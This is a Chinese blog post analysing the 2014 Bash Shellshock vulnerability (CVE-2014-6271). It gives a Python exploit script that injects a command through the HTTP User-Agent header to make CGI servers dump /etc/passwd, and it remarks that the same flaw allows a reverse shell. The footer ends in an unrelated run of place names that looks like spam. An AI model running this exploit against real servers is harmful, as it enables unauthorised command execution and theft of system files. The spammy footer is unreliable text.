qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          Bash遠程命令執行漏洞(CVE-2014-6271)分析利用

          這幾天Bash被爆存在遠程命令執行漏洞(CVE-2014-6271),昨天參加完isc,晚上回家測試了一下,寫了個python版本的測試小基本,貼上代碼:
          #coding:utf-8
          import urllib,httplib
          import sys,re,urlparse
          #author:nx4dm1n
          #website:http://www.nxadmin.com
          def bash_exp(url):
          urlsp=urlparse.urlparse(url)
          hostname=urlsp.netloc
          urlpath=urlsp.path
          conn=httplib.HTTPConnection(hostname)
          headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
          conn.request("GET",urlpath,headers=headers)
          res=conn.getresponse()
          res=res.getheaders()
          for passwdstr in res:
          print passwdstr[0]+':'+passwdstr[1]
          if __name__=='__main__':
          #帶http
          if len(sys.argv)<2:
          print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
          sys.exit()
          else:
          bash_exp(sys.argv[1])
            腳本執行效果如圖所示:
            bash命令執行
            也可以用burp進行測試。
            利用該漏洞其實可以做很多事情,寫的python小腳本只是執行了cat /etc/passwd??梢詧绦蟹聪蜴溄拥拿畹龋苯荧@取一個shell還是有可能的。不過漏洞存在的條件也比較苛刻,測試找了一些,發現了很少幾個存在漏洞

          posted on 2014-12-08 20:43 順其自然EVO 閱讀(348) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄

          <2014年12月>
          30123456
          78910111213
          14151617181920
          21222324252627
          28293031123
          45678910

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 沐川县| 新乡县| 万全县| 慈利县| 中宁县| 景谷| 丰镇市| 平陆县| 天峻县| 县级市| 洱源县| 清远市| 大宁县| 启东市| 乐业县| 惠来县| 宁都县| 冀州市| 新乡市| 岐山县| 洪洞县| 开江县| 上林县| 湖北省| 永修县| 横峰县| 清新县| 东辽县| 乌什县| 汕头市| 武城县| 中牟县| 科技| 永丰县| 大洼县| 常宁市| 波密县| 定结县| 永丰县| 嘉义县| 蓝山县|